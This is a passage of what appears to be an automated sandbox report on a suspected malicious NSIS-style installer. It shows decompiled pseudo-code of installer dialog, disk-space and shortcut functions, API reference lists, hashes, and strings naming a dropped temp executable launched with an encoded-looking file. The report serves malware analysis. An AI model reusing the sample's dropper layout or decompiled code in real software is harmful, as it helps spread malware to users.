				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                                              0x00405811
                                                                                              0x00405817
                                                                                              0x00405821
                                                                                              0x00405824
                                                                                              0x004059ba
                                                                                              0x004059de
                                                                                              0x004059de
                                                                                              0x004059f1
                                                                                              0x00405a0f
                                                                                              0x00405a11
                                                                                              0x00405a19
                                                                                              0x00405a6f
                                                                                              0x00405a73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a75
                                                                                              0x00405a7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a85
                                                                                              0x00405a8d
                                                                                              0x00405a90
                                                                                              0x00405b92
                                                                                              0x00000000
                                                                                              0x00405b92
                                                                                              0x00405a9f
                                                                                              0x00405aaa
                                                                                              0x00405ab3
                                                                                              0x00405abe
                                                                                              0x00405ac1
                                                                                              0x00405aca
                                                                                              0x00405ad0
                                                                                              0x00405ad3
                                                                                              0x00405ad3
                                                                                              0x00405aeb
                                                                                              0x00405af4
                                                                                              0x00405af7
                                                                                              0x00405afe
                                                                                              0x00405b05
                                                                                              0x00405b0d
                                                                                              0x00405b0d
                                                                                              0x00405b24
                                                                                              0x00405b24
                                                                                              0x00405b2b
                                                                                              0x00405b31
                                                                                              0x00405b3d
                                                                                              0x00405b44
                                                                                              0x00405b4d
                                                                                              0x00405b4f
                                                                                              0x00405b52
                                                                                              0x00405b61
                                                                                              0x00405b64
                                                                                              0x00405b6a
                                                                                              0x00405b6b
                                                                                              0x00405b71
                                                                                              0x00405b72
                                                                                              0x00405b73
                                                                                              0x00405b7b
                                                                                              0x00405b86
                                                                                              0x00405b8c
                                                                                              0x00405b8c
                                                                                              0x00000000
                                                                                              0x00405aeb
                                                                                              0x00405a21
                                                                                              0x00405a51
                                                                                              0x00405a59
                                                                                              0x00405a64
                                                                                              0x00405a64
                                                                                              0x00405a6a
                                                                                              0x00000000
                                                                                              0x00405a6a
                                                                                              0x00405a25
                                                                                              0x00405a2f
                                                                                              0x00000000
                                                                                              0x004059f3
                                                                                              0x004059f9
                                                                                              0x00405a34
                                                                                              0x00000000
                                                                                              0x00405a3d
                                                                                              0x00405a02
                                                                                              0x00405a07
                                                                                              0x00405a0a
                                                                                              0x00000000
                                                                                              0x00405a0a
                                                                                              0x004059f1
                                                                                              0x0040582a
                                                                                              0x0040582e
                                                                                              0x00405836
                                                                                              0x0040583a
                                                                                              0x0040583d
                                                                                              0x00405840
                                                                                              0x00405843
                                                                                              0x00405846
                                                                                              0x00405847
                                                                                              0x00405848
                                                                                              0x00405861
                                                                                              0x00405864
                                                                                              0x0040586e
                                                                                              0x0040587d
                                                                                              0x00405885
                                                                                              0x0040588d
                                                                                              0x00405892
                                                                                              0x00405895
                                                                                              0x004058a1
                                                                                              0x004058aa
                                                                                              0x004058b3
                                                                                              0x004058d5
                                                                                              0x004058db
                                                                                              0x004058ec
                                                                                              0x004058f1
                                                                                              0x004058ff
                                                                                              0x0040590d
                                                                                              0x0040590d
                                                                                              0x00405912
                                                                                              0x00405920
                                                                                              0x00405920
                                                                                              0x00405925
                                                                                              0x00405928
                                                                                              0x0040592d
                                                                                              0x00405939
                                                                                              0x00405942
                                                                                              0x0040594f
                                                                                              0x0040595e
                                                                                              0x00405951
                                                                                              0x00405956
                                                                                              0x00405956
                                                                                              0x0040596a
                                                                                              0x0040596a
                                                                                              0x0040597e
                                                                                              0x00405987
                                                                                              0x00405990
                                                                                              0x004059a0
                                                                                              0x004059ac
                                                                                              0x004059ac
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00405867
                                                                                              • GetDlgItem.USER32 ref: 00405876
                                                                                              • GetClientRect.USER32 ref: 004058B3
                                                                                              • GetSystemMetrics.USER32 ref: 004058BA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                              • GetDlgItem.USER32 ref: 00405977
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                              • GetDlgItem.USER32 ref: 00405885
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                              • GetDlgItem.USER32 ref: 004059C9
                                                                                              • CreateThread.KERNEL32 ref: 004059D7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                                              • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                              • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                              • CreatePopupMenu.USER32 ref: 00405A96
                                                                                              • AppendMenuW.USER32 ref: 00405AAA
                                                                                              • GetWindowRect.USER32 ref: 00405ACA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                              • EmptyClipboard.USER32 ref: 00405B31
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                              • GlobalLock.KERNEL32 ref: 00405B47
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                              • SetClipboardData.USER32 ref: 00405B86
                                                                                              • CloseClipboard.USER32 ref: 00405B8C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: H7B${
                                                                                              • API String ID: 590372296-2256286769
                                                                                              • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                              • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                              • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                              • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                              0x00404ab5
                                                                                              0x00404abb
                                                                                              0x00404ac1
                                                                                              0x00404ace
                                                                                              0x00404adc
                                                                                              0x00404adf
                                                                                              0x00404ae7
                                                                                              0x00404aed
                                                                                              0x00404aed
                                                                                              0x00404af9
                                                                                              0x00404afc
                                                                                              0x00404b6a
                                                                                              0x00404b71
                                                                                              0x00404c48
                                                                                              0x00404c4f
                                                                                              0x00404c5e
                                                                                              0x00404c5e
                                                                                              0x00404c62
                                                                                              0x00404c6c
                                                                                              0x00404c79
                                                                                              0x00404c7b
                                                                                              0x00404c7b
                                                                                              0x00404c89
                                                                                              0x00404c90
                                                                                              0x00404c97
                                                                                              0x00404c9a
                                                                                              0x00404cd6
                                                                                              0x00404cd8
                                                                                              0x00404cde
                                                                                              0x00404ce3
                                                                                              0x00404ce7
                                                                                              0x00404ce9
                                                                                              0x00404ce9
                                                                                              0x00404d05
                                                                                              0x00000000
                                                                                              0x00404d07
                                                                                              0x00404d0a
                                                                                              0x00404d18
                                                                                              0x00404d1e
                                                                                              0x00404d1f
                                                                                              0x00404d22
                                                                                              0x00404d25
                                                                                              0x00000000
                                                                                              0x00404d25
                                                                                              0x00404c9c
                                                                                              0x00404c9e
                                                                                              0x00404ca2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404ca4
                                                                                              0x00404ca4
                                                                                              0x00404cb1
                                                                                              0x00404cb6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404cba
                                                                                              0x00404cbc
                                                                                              0x00404cbc
                                                                                              0x00404cc5
                                                                                              0x00404cc7
                                                                                              0x00404ccc
                                                                                              0x00404ccf
                                                                                              0x00404cd4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404cd4
                                                                                              0x00404d31
                                                                                              0x00404d3b
                                                                                              0x00404d3e
                                                                                              0x00404d41
                                                                                              0x00404d48
                                                                                              0x00404d48
                                                                                              0x00404d4a
                                                                                              0x00404d4a
                                                                                              0x00404d4f
                                                                                              0x00404d51
                                                                                              0x00404d59
                                                                                              0x00404d60
                                                                                              0x00404d62
                                                                                              0x00404d6d
                                                                                              0x00404d6d
                                                                                              0x00404d62
                                                                                              0x00404d7d
                                                                                              0x00404d87
                                                                                              0x00404d8f
                                                                                              0x00404daa
                                                                                              0x00404d91
                                                                                              0x00404d9a
                                                                                              0x00404d9a
                                                                                              0x00404d8f
                                                                                              0x00404daf
                                                                                              0x00404db4
                                                                                              0x00404db9
                                                                                              0x00404dc2
                                                                                              0x00404dc2
                                                                                              0x00404dcb
                                                                                              0x00404dcd
                                                                                              0x00404dcd
                                                                                              0x00404dd9
                                                                                              0x00404de1
                                                                                              0x00404deb
                                                                                              0x00404deb
                                                                                              0x00404df0
                                                                                              0x00000000
                                                                                              0x00404df0
                                                                                              0x00404c9a
                                                                                              0x00404c51
                                                                                              0x00404c58
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404c58
                                                                                              0x00404b77
                                                                                              0x00404b80
                                                                                              0x00404b9a
                                                                                              0x00404b9f
                                                                                              0x00404ba9
                                                                                              0x00404bb0
                                                                                              0x00404bbc
                                                                                              0x00404bbf
                                                                                              0x00404bc2
                                                                                              0x00404bc9
                                                                                              0x00404bd1
                                                                                              0x00404bd4
                                                                                              0x00404bd8
                                                                                              0x00404bdf
                                                                                              0x00404be7
                                                                                              0x00404c41
                                                                                              0x00404be9
                                                                                              0x00404bea
                                                                                              0x00404bf1
                                                                                              0x00404bfb
                                                                                              0x00404c03
                                                                                              0x00404c10
                                                                                              0x00404c24
                                                                                              0x00404c28
                                                                                              0x00404c28
                                                                                              0x00404c24
                                                                                              0x00404c2d
                                                                                              0x00404c3a
                                                                                              0x00404c3a
                                                                                              0x00404be7
                                                                                              0x00000000
                                                                                              0x00404b9f
                                                                                              0x00404b8d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404b93
                                                                                              0x00000000
                                                                                              0x00404afe
                                                                                              0x00404b0b
                                                                                              0x00404b14
                                                                                              0x00404b21
                                                                                              0x00404b21
                                                                                              0x00404b28
                                                                                              0x00404b2e
                                                                                              0x00404b37
                                                                                              0x00404b3a
                                                                                              0x00404b3d
                                                                                              0x00404b45
                                                                                              0x00404b48
                                                                                              0x00404b4b
                                                                                              0x00404b51
                                                                                              0x00404b58
                                                                                              0x00404b5f
                                                                                              0x00404df6
                                                                                              0x00404e08
                                                                                              0x00404b65
                                                                                              0x00404b68
                                                                                              0x00000000
                                                                                              0x00404b68
                                                                                              0x00404b5f

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00404B04
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                              • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00423748,00000000,?,?), ref: 00404C1C
                                                                                              • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m), ref: 00404C28
                                                                                              • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                                • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m$A$C:\Users\user\AppData\Local\Temp$H7B
                                                                                              • API String ID: 2624150263-1197232728
                                                                                              • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                              • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                              • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                              • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                              0x004021b3
                                                                                              0x004021bd
                                                                                              0x004021c7
                                                                                              0x004021d1
                                                                                              0x004021dc
                                                                                              0x004021df
                                                                                              0x004021f9
                                                                                              0x004021fc
                                                                                              0x00402202
                                                                                              0x00402205
                                                                                              0x0040220f
                                                                                              0x00402213
                                                                                              0x00402213
                                                                                              0x00402218
                                                                                              0x00402229
                                                                                              0x00402231
                                                                                              0x004022e8
                                                                                              0x004022e8
                                                                                              0x004022ef
                                                                                              0x00402237
                                                                                              0x00402237
                                                                                              0x00402246
                                                                                              0x0040224a
                                                                                              0x0040224d
                                                                                              0x00402253
                                                                                              0x00402261
                                                                                              0x00402264
                                                                                              0x00402266
                                                                                              0x00402271
                                                                                              0x00402271
                                                                                              0x00402276
                                                                                              0x00402278
                                                                                              0x0040227f
                                                                                              0x0040227f
                                                                                              0x00402282
                                                                                              0x0040228b
                                                                                              0x0040228e
                                                                                              0x00402294
                                                                                              0x00402296
                                                                                              0x004022a0
                                                                                              0x004022a0
                                                                                              0x004022a3
                                                                                              0x004022ac
                                                                                              0x004022af
                                                                                              0x004022b8
                                                                                              0x004022be
                                                                                              0x004022c0
                                                                                              0x004022ce
                                                                                              0x004022ce
                                                                                              0x004022d1
                                                                                              0x004022d7
                                                                                              0x004022d7
                                                                                              0x004022da
                                                                                              0x004022e0
                                                                                              0x004022e6
                                                                                              0x004022fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004022e6
                                                                                              0x004022f1
                                                                                              0x00402c2d
                                                                                              0x00402c39

